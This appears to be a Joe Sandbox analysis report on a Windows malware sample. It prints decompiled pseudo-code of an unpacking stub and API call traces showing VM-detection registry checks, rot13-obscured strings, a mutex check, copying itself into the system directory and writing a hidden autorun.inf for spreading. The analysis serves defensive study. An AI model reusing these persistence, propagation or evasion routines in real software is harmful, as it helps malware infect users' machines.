                                                                          • Instruction ID: d52cf87232b6bef55ae32812e2a2d770b7a0cdaf13e0b01d7b079ce95a9ef0d7
                                                                          • Opcode Fuzzy Hash: 8273f13c3081dc19d4445e322601c3b2f268dd5fec60ff3e337f340c7e888451
                                                                          • Instruction Fuzzy Hash: 8711C2F0808305AFDB00EF69C18575EBBF4BB84358F40892EE88897241E378D6488F92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 53%
                                                                          			_entry_(intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                          				void* _v12;
                                                                          				intOrPtr _v20;
                                                                          				intOrPtr _v24;
                                                                          				char _v128;
                                                                          				long _t34;
                                                                          				long _t35;
                                                                          				long _t40;
                                                                          				long _t47;
                                                                          				signed int _t49;
                                                                          				intOrPtr _t52;
                                                                          				void* _t57;
                                                                          				intOrPtr* _t58;
                                                                          
                                                                          				if(_a8 != 1) {
                                                                          					L62:
                                                                          					_t58 = _t57 - 0x10;
                                                                          					_t52 = _a8;
                                                                          					if(_t52 == 1) {
                                                                          						 *_t58 = 0x80;
                                                                          						_t34 = malloc(??);
                                                                          						 *0x10006000 = _t34;
                                                                          						__eflags = _t34;
                                                                          						if(_t34 == 0) {
                                                                          							L100034A0();
                                                                          							 *_t34 = 0xc;
                                                                          							_t35 = 0;
                                                                          						} else {
                                                                          							 *_t34 = 0;
                                                                          							 *0x10006010 = _t34;
                                                                          							E10003110(_t34);
                                                                          							E100030F0();
                                                                          							goto L2;
                                                                          						}
                                                                          					} else {
                                                                          						L2:
                                                                          						_v24 = _t52;
                                                                          						_v20 = _a12;
                                                                          						 *_t58 = _a4; // executed
                                                                          						_t40 = E10002EC6(); // executed
                                                                          						_t47 = _t40;
                                                                          						if(((0 | _t47 == 0x00000000) & (_t49 & 0xffffff00 | _t52 == 0x00000001)) != 0) {
                                                                          							E10001000();
                                                                          						}
                                                                          						if(_t52 == 0) {
                                                                          							if( *0x10006000 != 0) {
                                                                          								E10001000();
                                                                          							} else {
                                                                          								_t47 = 0;
                                                                          							}
                                                                          						}
                                                                          						_t35 = _t47;
                                                                          					}
                                                                          					return _t35;
                                                                          				} else {
                                                                          					asm("pushad");
                                                                          					__esi = "oseHandle";
                                                                          					__edi = __esi - 0x9015;
                                                                          					_push(__edi);
                                                                          					while(1) {
                                                                          						__ebx =  *__esi;
                                                                          						__esi = __esi - 0xfffffffc;
                                                                          						asm("adc ebx, ebx");
                                                                          						do {
                                                                          							if(__eflags < 0) {
                                                                          								__al =  *__esi;
                                                                          								__esi = __esi + 1;
                                                                          								 *__edi = __al;
                                                                          								__edi = __edi + 1;
                                                                          								__eflags = __edi;
                                                                          								goto L15;
                                                                          							}
                                                                          							__eax = 1;
                                                                          							goto L19;
                                                                          							do {
                                                                          								do {
                                                                          									L19:
                                                                          									__ebx = __ebx + __ebx;
                                                                          									__eflags = __ebx;
                                                                          									if(__ebx == 0) {
                                                                          										__ebx =  *__esi;
                                                                          										__esi = __esi - 0xfffffffc;
                                                                          										asm("adc ebx, ebx");
                                                                          									}
                                                                          									asm("adc eax, eax");
                                                                          									__ebx = __ebx + __ebx;
                                                                          									__eflags = __ebx;
                                                                          								} while (__eflags >= 0);
                                                                          								if(__eflags == 0) {
                                                                          									goto L23;
                                                                          								}
                                                                          								break;
                                                                          								L23:
                                                                          								__ebx =  *__esi;
                                                                          								__esi = __esi - 0xfffffffc;
                                                                          								__eflags = __esi;
                                                                          								asm("adc ebx, ebx");
                                                                          							} while (__esi >= 0);
                                                                          							__ecx = 0;
                                                                          							__eax = __eax - 3;
                                                                          							__eflags = __eax;
                                                                          							if(__eax < 0) {
                                                                          								L27:
                                                                          								__ebx = __ebx + __ebx;
                                                                          								__eflags = __ebx;
                                                                          								if(__ebx == 0) {
                                                                          									__ebx =  *__esi;
                                                                          									__esi = __esi - 0xfffffffc;
                                                                          									asm("adc ebx, ebx");
                                                                          								}
                                                                          								asm("adc ecx, ecx");
                                                                          								__ebx = __ebx + __ebx;
                                                                          								__eflags = __ebx;
                                                                          								if(__eflags == 0) {
                                                                          									__ebx =  *__esi;
                                                                          									__esi = __esi - 0xfffffffc;
                                                                          									asm("adc ebx, ebx");
                                                                          								}
                                                                          								asm("adc ecx, ecx");
                                                                          								if(__eflags == 0) {
                                                                          									__ecx = __ecx + 1;
                                                                          									__eflags = __ecx;
                                                                          									goto L33;
                                                                          									do {
                                                                          										do {
                                                                          											L33:
                                                                          											__ebx = __ebx + __ebx;
                                                                          											__eflags = __ebx;
                                                                          											if(__ebx == 0) {
                                                                          												__ebx =  *__esi;
                                                                          												__esi = __esi - 0xfffffffc;
                                                                          												asm("adc ebx, ebx");
                                                                          											}
                                                                          											asm("adc ecx, ecx");
                                                                          											__ebx = __ebx + __ebx;
                                                                          											__eflags = __ebx;
                                                                          										} while (__eflags >= 0);
                                                                          										if(__eflags == 0) {
                                                                          											goto L37;
                                                                          										}
                                                                          										break;
                                                                          										L37:
                                                                          										__ebx =  *__esi;
                                                                          										__esi = __esi - 0xfffffffc;
                                                                          										__eflags = __esi;
                                                                          										asm("adc ebx, ebx");
                                                                          									} while (__esi >= 0);
                                                                          									__ecx = __ecx + 2;
                                                                          									__eflags = __ecx;
                                                                          								}
                                                                          								__eflags = __ebp - 0xfffff300;
                                                                          								asm("adc ecx, 0x1");
                                                                          								__edx = __edi + __ebp;
                                                                          								__eflags = __ebp - 0xfffffffc;
                                                                          								if(__ebp <= 0xfffffffc) {
                                                                          									do {
                                                                          										__eax =  *__edx;
                                                                          										__edx =  &(__edx[1]);
                                                                          										 *__edi = __eax;
                                                                          										__edi = __edi + 4;
                                                                          										__ecx = __ecx - 4;
                                                                          										__eflags = __ecx;
                                                                          									} while (__ecx > 0);
                                                                          									__edi = __edi + __ecx;
                                                                          								} else {
                                                                          									do {
                                                                          										__al =  *__edx;
                                                                          										__edx =  &(__edx[0]);
                                                                          										 *__edi = __al;
                                                                          										__edi = __edi + 1;
                                                                          										__ecx = __ecx - 1;
                                                                          										__eflags = __ecx;
                                                                          									} while (__ecx != 0);
                                                                          								}
                                                                          								goto L15;
                                                                          								do {
                                                                          									do {
                                                                          										L45:
                                                                          										__al =  *__edi;
                                                                          										__edi = __edi + 1;
                                                                          										__al = __al - 0xe8;
                                                                          										__eflags = __al - 1;
                                                                          									} while (__al > 1);
                                                                          									__eflags =  *__edi;
                                                                          								} while ( *__edi != 0);
                                                                          								__eax =  *__edi;
                                                                          								__bl =  *(__edi + 4);
                                                                          								__ax = __ax >> 8;
                                                                          								asm("rol eax, 0x10");
                                                                          								_t17 = __al;
                                                                          								__al = __ah;
                                                                          								__ah = _t17;
                                                                          								__eax =  *__edi - __edi;
                                                                          								__bl =  *(__edi + 4) - 0xe8;
                                                                          								__eax = __esi +  *__edi - __edi;
                                                                          								 *__edi = __esi +  *__edi - __edi;
                                                                          								__eflags = __edi;
                                                                          								__al = __bl;
                                                                          								asm("loop 0xffffffdb");
                                                                          								__edi = __esi + 0x9000;
                                                                          								while(1) {
                                                                          									L48:
                                                                          									__eax =  *__edi;
                                                                          									__eax =  *__edi;
                                                                          									__eflags = __eax;
                                                                          									if(__eax == 0) {
                                                                          										break;
                                                                          									}
                                                                          									__ebx =  *(__edi + 4);
                                                                          									__eax = __eax + __esi + 0xb000;
                                                                          									__ebx = __esi +  *(__edi + 4);
                                                                          									__edi = __edi + 8;
                                                                          									__eflags = __edi;
                                                                          									_t23 =  *((intOrPtr*)(__esi + 0xb078))(__eax);
                                                                          									__eax = __ebp;
                                                                          									__ebp = _t23;
                                                                          									while(1) {
                                                                          										__al =  *__edi;
                                                                          										__edi = __edi + 1;
                                                                          										__al = __al;
                                                                          										__eflags = __al;
                                                                          										if(__al == 0) {
                                                                          											goto L48;
                                                                          										}
                                                                          										__ecx = __edi;
                                                                          										__eax = __eax - 1;
                                                                          										asm("repne scasb");
                                                                          										__eax =  *((intOrPtr*)(__esi + 0xb07c))(__ebp, __edi);
                                                                          										__eax = __eax;
                                                                          										__eflags = __eax;
                                                                          										if(__eax == 0) {
                                                                          											asm("popad");
                                                                          											__eax = 0;
                                                                          											__eflags = 0;
                                                                          											return 0;
                                                                          										} else {
                                                                          											 *__ebx = __eax;
                                                                          											__ebx = __ebx + 4;
                                                                          											continue;
                                                                          										}
                                                                          										goto L63;
                                                                          									}
                                                                          								}
                                                                          								__edi = __edi + 4;
                                                                          								__eflags = __edi;
                                                                          								__ebx = __esi - 4;
                                                                          								while(1) {
                                                                          									__eax = 0;
                                                                          									__al =  *__edi;
                                                                          									__edi = __edi + 1;
                                                                          									__eax = 0;
                                                                          									__eflags = 0;
                                                                          									if(0 == 0) {
                                                                          										break;
                                                                          									}
                                                                          									__eflags = __al - 0xef;
                                                                          									if(__al > 0xef) {
                                                                          										__al = __al & 0x0000000f;
                                                                          										__eax = 0 << 0x10;
                                                                          										__ax =  *__edi;
                                                                          										__edi = __edi + 2;
                                                                          									}
                                                                          									__ebx = __ebx + __eax;
                                                                          									__eax =  *__ebx;
                                                                          									_t26 = __al;
                                                                          									__al = __ah;
                                                                          									__ah = _t26;
                                                                          									asm("rol eax, 0x10");
                                                                          									_t27 = __al;
                                                                          									__al = _t26;
                                                                          									__ah = _t27;
                                                                          									__eax = __esi +  *__ebx;
                                                                          									 *__ebx = __esi +  *__ebx;
                                                                          								}
                                                                          								__ebp =  *(__esi + 0xb080);
                                                                          								__edi = __esi - 0x1000;
                                                                          								__ebx = 0x1000;
                                                                          								_push(0);
                                                                          								__eax = VirtualProtect(__edi, 0x1000, 4, __esp); // executed
                                                                          								__eax = __edi + 0x19f;
                                                                          								 *__eax =  *__eax & 0x0000007f;
                                                                          								_t31 = __eax + 0x28;
                                                                          								 *_t31 =  *(__eax + 0x28) & 0x0000007f;
                                                                          								__eflags =  *_t31;
                                                                          								_pop(__eax);
                                                                          								__eax = VirtualProtect(__edi, 0x1000, __eax, __esp); // executed
                                                                          								__eax = __eax;
                                                                          								asm("popad");
                                                                          								__eax =  &_v128;
                                                                          								do {
                                                                          									_push(0);
                                                                          									__eflags = __esp - __eax;
                                                                          								} while (__esp != __eax);
                                                                          								__esp = __esp - 0xffffff80;
                                                                          								goto L62;
                                                                          							}
                                                                          							__eax = __eax << 8;
                                                                          							__al =  *__esi;
                                                                          							__esi = __esi + 1;
                                                                          							__eax = __eax ^ 0xffffffff;
                                                                          							__eflags = __eax;
                                                                          							if(__eax != 0) {
                                                                          								__ebp = __eax;
                                                                          								goto L27;
                                                                          							}
                                                                          							_pop(__esi);
                                                                          							__edi = __esi;
                                                                          							__ecx = 0xf4;
                                                                          							goto L45;
                                                                          							L15:
                                                                          							__ebx = __ebx + __ebx;
                                                                          							__eflags = __ebx;
                                                                          						} while (__eflags != 0);
                                                                          					}
                                                                          				}
                                                                          				L63:
                                                                          			}















                                                                          0x1000b675
                                                                          0x1000b834
                                                                          0x10001065
                                                                          0x10001068
                                                                          0x1000106e
                                                                          0x100010b7
                                                                          0x100010be
                                                                          0x100010c3
                                                                          0x100010c8
                                                                          0x100010ca
                                                                          0x100010f7
                                                                          0x100010fc
                                                                          0x10001102
                                                                          0x100010cc
                                                                          0x100010cc
                                                                          0x100010d2
                                                                          0x100010d7
                                                                          0x100010dc
                                                                          0x00000000
                                                                          0x100010dc
                                                                          0x10001070
                                                                          0x10001070
                                                                          0x10001070
                                                                          0x10001077
                                                                          0x1000107e
                                                                          0x10001081
                                                                          0x10001086
                                                                          0x1000109a
                                                                          0x100010e3
                                                                          0x100010e3
                                                                          0x1000109e
                                                                          0x100010a8
                                                                          0x100010f0
                                                                          0x100010aa
                                                                          0x100010aa
                                                                          0x100010aa
                                                                          0x100010a8
                                                                          0x100010ac
                                                                          0x100010ac
                                                                          0x100010b4
                                                                          0x1000b67b
                                                                          0x1000b67b
                                                                          0x1000b67c
                                                                          0x1000b681
                                                                          0x1000b687
                                                                          0x1000b69a
                                                                          0x1000b69a
                                                                          0x1000b69c
                                                                          0x1000b69f
                                                                          0x1000b6a1
                                                                          0x1000b6a1
                                                                          0x1000b690
                                                                          0x1000b692
                                                                          0x1000b693
                                                                          0x1000b695
                                                                          0x1000b695
                                                                          0x00000000
                                                                          0x1000b695
                                                                          0x1000b6a3
                                                                          0x1000b6a3
                                                                          0x1000b6a8
                                                                          0x1000b6a8
                                                                          0x1000b6a8
                                                                          0x1000b6a8
                                                                          0x1000b6a8
                                                                          0x1000b6aa
                                                                          0x1000b6ac
                                                                          0x1000b6ae
                                                                          0x1000b6b1
                                                                          0x1000b6b1
                                                                          0x1000b6b3
                                                                          0x1000b6b5
                                                                          0x1000b6b5
                                                                          0x1000b6b5
                                                                          0x1000b6b9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000b6bb
                                                                          0x1000b6bb
                                                                          0x1000b6bd
                                                                          0x1000b6bd
                                                                          0x1000b6c0
                                                                          0x1000b6c0
                                                                          0x1000b6c4
                                                                          0x1000b6c6
                                                                          0x1000b6c6
                                                                          0x1000b6c9
                                                                          0x1000b6d8
                                                                          0x1000b6d8
                                                                          0x1000b6d8
                                                                          0x1000b6da
                                                                          0x1000b6dc
                                                                          0x1000b6de
                                                                          0x1000b6e1
                                                                          0x1000b6e1
                                                                          0x1000b6e3
                                                                          0x1000b6e5
                                                                          0x1000b6e5
                                                                          0x1000b6e7
                                                                          0x1000b6e9
                                                                          0x1000b6eb
                                                                          0x1000b6ee
                                                                          0x1000b6ee
                                                                          0x1000b6f0
                                                                          0x1000b6f2
                                                                          0x1000b6f4
                                                                          0x1000b6f4
                                                                          0x1000b6f4
                                                                          0x1000b6f5
                                                                          0x1000b6f5
                                                                          0x1000b6f5
                                                                          0x1000b6f5
                                                                          0x1000b6f5
                                                                          0x1000b6f7
                                                                          0x1000b6f9
                                                                          0x1000b6fb
                                                                          0x1000b6fe
                                                                          0x1000b6fe
                                                                          0x1000b700
                                                                          0x1000b702
                                                                          0x1000b702
                                                                          0x1000b702
                                                                          0x1000b706
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000b708
                                                                          0x1000b708
                                                                          0x1000b70a
                                                                          0x1000b70a
                                                                          0x1000b70d
                                                                          0x1000b70d
                                                                          0x1000b711
                                                                          0x1000b711
                                                                          0x1000b711
                                                                          0x1000b714
                                                                          0x1000b71a
                                                                          0x1000b71d
                                                                          0x1000b720
                                                                          0x1000b723
                                                                          0x1000b734
                                                                          0x1000b734
                                                                          0x1000b736
                                                                          0x1000b739
                                                                          0x1000b73b
                                                                          0x1000b73e
                                                                          0x1000b73e
                                                                          0x1000b73e
                                                                          0x1000b743
                                                                          0x1000b725
                                                                          0x1000b725
                                                                          0x1000b725
                                                                          0x1000b727
                                                                          0x1000b728
                                                                          0x1000b72a
                                                                          0x1000b72b
                                                                          0x1000b72b
                                                                          0x1000b72b
                                                                          0x1000b72e
                                                                          0x00000000
                                                                          0x1000b752
                                                                          0x1000b752
                                                                          0x1000b752
                                                                          0x1000b752
                                                                          0x1000b754
                                                                          0x1000b755
                                                                          0x1000b757
                                                                          0x1000b757
                                                                          0x1000b75b
                                                                          0x1000b75b
                                                                          0x1000b760
                                                                          0x1000b762
                                                                          0x1000b765
                                                                          0x1000b769
                                                                          0x1000b76c
                                                                          0x1000b76c
                                                                          0x1000b76c
                                                                          0x1000b76e
                                                                          0x1000b770
                                                                          0x1000b773
                                                                          0x1000b775
                                                                          0x1000b777
                                                                          0x1000b77a
                                                                          0x1000b77c
                                                                          0x1000b77e
                                                                          0x1000b784
                                                                          0x1000b784
                                                                          0x1000b784
                                                                          0x1000b786
                                                                          0x1000b786
                                                                          0x1000b788
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000b78a
                                                                          0x1000b78d
                                                                          0x1000b794
                                                                          0x1000b797
                                                                          0x1000b797
                                                                          0x1000b7a0
                                                                          0x1000b7a0
                                                                          0x1000b7a0
                                                                          0x1000b7a1
                                                                          0x1000b7a1
                                                                          0x1000b7a3
                                                                          0x1000b7a4
                                                                          0x1000b7a4
                                                                          0x1000b7a6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000b7a8
                                                                          0x1000b7ab
                                                                          0x1000b7ac
                                                                          0x1000b7af
                                                                          0x1000b7b5
                                                                          0x1000b7b5
                                                                          0x1000b7b7
                                                                          0x1000b7c0
                                                                          0x1000b7c1
                                                                          0x1000b7c1
                                                                          0x1000b7c3
                                                                          0x1000b7b9
                                                                          0x1000b7b9
                                                                          0x1000b7bb
                                                                          0x00000000
                                                                          0x1000b7bb
                                                                          0x00000000
                                                                          0x1000b7b7
                                                                          0x1000b7a1
                                                                          0x1000b7c6
                                                                          0x1000b7c6
                                                                          0x1000b7c9
                                                                          0x1000b7cc
                                                                          0x1000b7cc
                                                                          0x1000b7ce
                                                                          0x1000b7d0
                                                                          0x1000b7d1
                                                                          0x1000b7d1
                                                                          0x1000b7d3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000b7d5
                                                                          0x1000b7d7
                                                                          0x1000b7ea
                                                                          0x1000b7ec
                                                                          0x1000b7ef
                                                                          0x1000b7f2
                                                                          0x1000b7f2
                                                                          0x1000b7d9
                                                                          0x1000b7db
                                                                          0x1000b7dd
                                                                          0x1000b7dd
                                                                          0x1000b7dd
                                                                          0x1000b7df
                                                                          0x1000b7e2
                                                                          0x1000b7e2
                                                                          0x1000b7e2
                                                                          0x1000b7e4
                                                                          0x1000b7e6
                                                                          0x1000b7e6
                                                                          0x1000b7f7
                                                                          0x1000b7fd
                                                                          0x1000b803
                                                                          0x1000b808
                                                                          0x1000b80e
                                                                          0x1000b810
                                                                          0x1000b816
                                                                          0x1000b819
                                                                          0x1000b819
                                                                          0x1000b819
                                                                          0x1000b81d
                                                                          0x1000b823
                                                                          0x1000b825
                                                                          0x1000b826
                                                                          0x1000b827
                                                                          0x1000b82b
                                                                          0x1000b82b
                                                                          0x1000b82d
                                                                          0x1000b82d
                                                                          0x1000b831
                                                                          0x00000000
                                                                          0x1000b831
                                                                          0x1000b6cb
                                                                          0x1000b6ce
                                                                          0x1000b6d0
                                                                          0x1000b6d1
                                                                          0x1000b6d1
                                                                          0x1000b6d4
                                                                          0x1000b6d6
                                                                          0x00000000
                                                                          0x1000b6d6
                                                                          0x1000b74a
                                                                          0x1000b74b
                                                                          0x1000b74d
                                                                          0x00000000
                                                                          0x1000b696
                                                                          0x1000b696
                                                                          0x1000b696
                                                                          0x1000b696
                                                                          0x1000b6a1
                                                                          0x1000b69a
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: oseHandle
                                                                          • API String ID: 0-3110874022
                                                                          • Opcode ID: 55b444f5287c2d11894ddcccc202fc63c889c2cb23919d4899b9ba0c6a4af2f8
                                                                          • Instruction ID: 6777197e7aff05cd1e47f9124ab84a08ecd71be59056bc9e2c07408dd8449df4
                                                                          • Opcode Fuzzy Hash: 55b444f5287c2d11894ddcccc202fc63c889c2cb23919d4899b9ba0c6a4af2f8
                                                                          • Instruction Fuzzy Hash: DD51F871648B925BF710DE788CC07957BD4DB812E4B290738D9E5CB3CAE7A8580687A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00404748: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00404A84), ref: 00404781
                                                                            • Part of subcall function 00404748: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047AF
                                                                            • Part of subcall function 00404748: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047EA
                                                                            • Part of subcall function 00404748: RegCloseKey.ADVAPI32 ref: 004047FA
                                                                          • CharLowerA.USER32 ref: 00404A8B
                                                                            • Part of subcall function 00404990: strstr.MSVCRT ref: 004049C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CharCloseLowerQueryValuestrstr
                                                                          • String ID: 012$SYSTEM\ControlSet001\Services\Disk\Enum
                                                                          • API String ID: 2399448135-1634863437
                                                                          • Opcode ID: 63ad2961c44aed94491a08e231f8cdb63fefdf94793549163df92be3ee8e9100
                                                                          • Instruction ID: 870a1de997922802b68f1717d84fe3bed6c75bca7598e79a585ce558600d9c18
                                                                          • Opcode Fuzzy Hash: 63ad2961c44aed94491a08e231f8cdb63fefdf94793549163df92be3ee8e9100
                                                                          • Instruction Fuzzy Hash: 7221A6B4904218DFCB60DF68EA8069DBBF4EB48314F50413AE958F7750D33499498F99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: fclosefopen
                                                                          • String ID: Q
                                                                          • API String ID: 1280645193-3894087120
                                                                          • Opcode ID: d11b7e04d193afe19875c3f0bb31fea1c1a234c9f78bf7c27ca1675ec82f5387
                                                                          • Instruction ID: fc467ff3ac9e7cdac0bddd603bffc4fa3c1df253e59169ed2f43415d9b654fe0
                                                                          • Opcode Fuzzy Hash: d11b7e04d193afe19875c3f0bb31fea1c1a234c9f78bf7c27ca1675ec82f5387
                                                                          • Instruction Fuzzy Hash: AFD09E7860430457E701AB75954535B7AD9DB402C4F41C828E8858F38DE6B5E8418791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • rot13.SHERVANS ref: 10002A2B
                                                                            • Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40
                                                                          • CreateMutexA.KERNEL32 ref: 10002A43
                                                                          • GetLastError.KERNEL32 ref: 10002A4B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastMutexrot13rot13c
                                                                          • String ID:
                                                                          • API String ID: 915986942-0
                                                                          • Opcode ID: ee8ea586af41e913590f4dc365a00a8f608733261f8a1858d002a386ab06bff8
                                                                          • Instruction ID: 37426019501c0c1615168472e2e031f059b69aac5c44e8d8eb959c1da4a6e9fe
                                                                          • Opcode Fuzzy Hash: ee8ea586af41e913590f4dc365a00a8f608733261f8a1858d002a386ab06bff8
                                                                          • Instruction Fuzzy Hash: DFE04FB44083059AD700EF61C5C139EBFF4EF40385F40841DE88843286D779A5489B23
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E10002EA8(struct _SECURITY_ATTRIBUTES* __ebx, signed int __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                          				void* _t9;
                                                                          
                                                                          				_t9 = __eflags;
                                                                          				_t5 = __ebx;
                                                                          				E10002C6C(); // executed
                                                                          				E10002A16(__ebx); // executed
                                                                          				E10002806(_t5, __edx, __edi, __esi, _t9); // executed
                                                                          				return 0;
                                                                          			}




                                                                          0x10002ea8
                                                                          0x10002ea8
                                                                          0x10002eae
                                                                          0x10002eb3
                                                                          0x10002eb8
                                                                          0x10002ec3

                                                                          APIs
                                                                          • copy_filez.SHERVANS ref: 10002EAE
                                                                            • Part of subcall function 10002C6C: rot13.SHERVANS ref: 10002C88
                                                                            • Part of subcall function 10002C6C: add_system_direcroty.SHERVANS ref: 10002CA2
                                                                            • Part of subcall function 10002C6C: rot13.SHERVANS ref: 10002CB2
                                                                            • Part of subcall function 10002C6C: add_system_direcroty.SHERVANS ref: 10002CCC
                                                                            • Part of subcall function 10002C6C: CopyFileA.KERNEL32 ref: 10002CE0
                                                                          • mutex_check.SHERVANS ref: 10002EB3
                                                                            • Part of subcall function 10002A16: rot13.SHERVANS ref: 10002A2B
                                                                            • Part of subcall function 10002A16: CreateMutexA.KERNEL32 ref: 10002A43
                                                                            • Part of subcall function 10002A16: GetLastError.KERNEL32 ref: 10002A4B
                                                                          • copy_autoinf.SHERVANS ref: 10002EB8
                                                                            • Part of subcall function 10002806: rot13.SHERVANS ref: 10002829
                                                                            • Part of subcall function 10002806: Get_Reg_SZ.SHERVANS ref: 10002849
                                                                            • Part of subcall function 10002806: sss_rans.SHERVANS ref: 10002859
                                                                            • Part of subcall function 10002806: Write_REG_SZ.SHERVANS ref: 10002894
                                                                            • Part of subcall function 10002806: rot13.SHERVANS ref: 100028AA
                                                                            • Part of subcall function 10002806: add_system_direcroty.SHERVANS ref: 100028C4
                                                                            • Part of subcall function 10002806: filetyt.SHERVANS ref: 100028D2
                                                                            • Part of subcall function 10002806: wsprintfA.USER32 ref: 10002900
                                                                            • Part of subcall function 10002806: CreateFileA.KERNEL32 ref: 10002938
                                                                            • Part of subcall function 10002806: WriteFile.KERNEL32 ref: 1000297F
                                                                            • Part of subcall function 10002806: CloseHandle.KERNEL32 ref: 1000298A
                                                                            • Part of subcall function 10002806: SetFileAttributesA.KERNEL32 ref: 100029A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
